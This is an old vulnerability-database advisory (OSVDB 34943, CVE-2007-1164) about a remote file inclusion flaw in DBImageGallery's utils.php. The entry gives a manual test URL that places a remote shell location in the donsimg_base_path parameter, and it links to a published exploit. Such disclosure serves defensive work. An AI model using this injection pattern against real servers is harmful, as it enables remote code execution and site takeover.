DBImageGallery /includes/utils.php donsimg_base_path Remote Variable File Inclusion

2007-02-21T02:34:46
ID OSVDB:34943
Type osvdb
Reporter OSVDB
Modified 2007-02-21T02:34:46

Description

Manual Testing Notes

http://[target]/path/includes/utils.php?donsimg_base_path=[SHELL]

References:

Related OSVDB ID: 34938 Related OSVDB ID: 34940 Related OSVDB ID: 34942 Related OSVDB ID: 34939 Related OSVDB ID: 34941 Related OSVDB ID: 34937 Related OSVDB ID: 34944 Mail List Post: http://archive.cert.uni-stuttgart.de/bugtraq/2007/03/msg00027.html Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-03/0024.html ISS X-Force ID: 32612 Generic Exploit URL: http://www.milw0rm.com/exploits/3353 FrSIRT Advisory: ADV-2007-0692 CVE-2007-1164 Bugtraq ID: 22657